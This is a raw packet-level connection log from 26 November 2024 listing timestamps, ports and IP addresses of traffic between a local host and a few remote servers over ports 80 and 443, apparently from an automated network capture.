Nov 26, 2024 00:25:41.600636959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.600667953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.600843906 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.600892067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.601742983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.601800919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.601835012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.602072954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.603372097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.603430986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.603487015 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.603540897 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.604461908 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.604473114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.604532957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.605773926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.605819941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.605911970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.605951071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.607027054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.607038975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.607091904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.608370066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.608422995 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.608474970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.608524084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.609618902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.609677076 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.609822989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.610085964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.611018896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.611032963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.611066103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.611088991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.612206936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.612438917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.612534046 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.613488913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.613514900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.613565922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.614794970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.615139008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.615201950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.615351915 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.615422010 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.615498066 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.615748882 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.615784883 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.615796089 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.615801096 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.616230965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.616246939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.616292953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.617496967 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.617526054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.617583036 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.618793964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.618808031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.618864059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.619038105 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.619076014 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.619137049 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.619508028 CET	49848	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.619518995 CET	443	49848	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.619987011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.620047092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.620079041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.621268034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.621335983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.621422052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.621520042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.622575045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.622807980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.622865915 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.623842955 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.624017000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.624074936 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.625246048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.625258923 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.625314951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.626549959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.626563072 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.626637936 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.627899885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.627912045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.627973080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.629111052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.629163027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.629225016 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.630508900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.630522013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.630589008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.631655931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.631747007 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.631808996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.633107901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.633120060 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.633186102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.633934975 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:41.634242058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.634476900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.634526968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.635729074 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.635741949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.635806084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.635806084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.636884928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.636970043 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.637032032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.637115955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.638192892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.638250113 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.638281107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.638482094 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.639555931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.639579058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.639635086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.639636040 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.640847921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.640860081 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.640897989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.640927076 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.642174006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.642185926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.642230988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.642230988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.643362999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.643424034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.643589020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.643642902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.644646883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.644721985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.644923925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.645534992 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.645920992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.646054983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.646192074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.647346973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.649537086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.779985905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.780062914 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.780162096 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.780213118 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.780580044 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.780628920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.780776978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.780891895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.781735897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.781800985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.781837940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.781888962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.783071995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.783087015 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.783123970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.783135891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.784358025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.784399986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.784434080 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.784523010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.785487890 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.785500050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.785545111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.786619902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.786704063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.786725044 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.786773920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.787861109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.787909985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.788053036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.788091898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.789048910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.789138079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.789191008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.790338993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.790359974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.790452957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.791589975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.791647911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.791707039 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.792769909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.792839050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.792905092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.793950081 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.794156075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.794207096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.795212030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.795269966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.795351028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.796380043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.796437979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.796499014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.797543049 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.797629118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.797704935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.797758102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.798852921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.798964977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.799027920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.800209045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.800228119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.800283909 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.801265955 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.801465988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.801520109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.802483082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.802572966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.802639961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.803690910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.803776026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.803837061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.805017948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.805071115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.805125952 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.806175947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.806329966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.806387901 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.807380915 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.807548046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.807621956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.808609009 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.808862925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.808931112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.809871912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.809910059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.809978008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.811120033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.811175108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.811244011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.812342882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.812541008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.812619925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.813498974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.813648939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.813720942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.814738035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.814970016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.815026999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.815983057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.816054106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.816128969 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.817290068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.817312002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.817538977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.818416119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.818645954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.818710089 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.819715977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.819729090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.819794893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.820821047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.821055889 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.821115017 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.822175980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.822191000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.822257042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.823297024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.823355913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.823420048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.824599028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.824616909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.824677944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.825676918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.825834036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.825902939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.826992035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.827075005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.827127934 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.828241110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.828253984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.828294039 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.828320026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.829340935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.829452991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.829514027 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.829540968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.830763102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.830775023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.830856085 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.831866980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.832067966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.832142115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.833009005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.833311081 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.833363056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.834320068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.834549904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.834598064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.835531950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.835544109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.835597038 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.835628033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.836771011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.836818933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.836832047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.837538958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.838015079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.838026047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.838078976 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.839252949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.839265108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.839349985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.840342045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.840564013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.840631962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.841682911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.841696024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.841749907 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.842952013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.842963934 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.843000889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.843027115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.844033957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.845530033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.883428097 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.887361050 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.887370110 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.888557911 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.888622999 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.889765978 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.889852047 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.889985085 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.889990091 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.972424984 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:41.981261969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.981338024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.981463909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.981515884 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.981875896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.981997013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.982004881 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.982048988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.983119011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.983194113 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.983304977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.983355999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.984375000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.984422922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.984548092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.984622002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.985522032 CET	80	49795	185.215.113.206	192.168.2.6
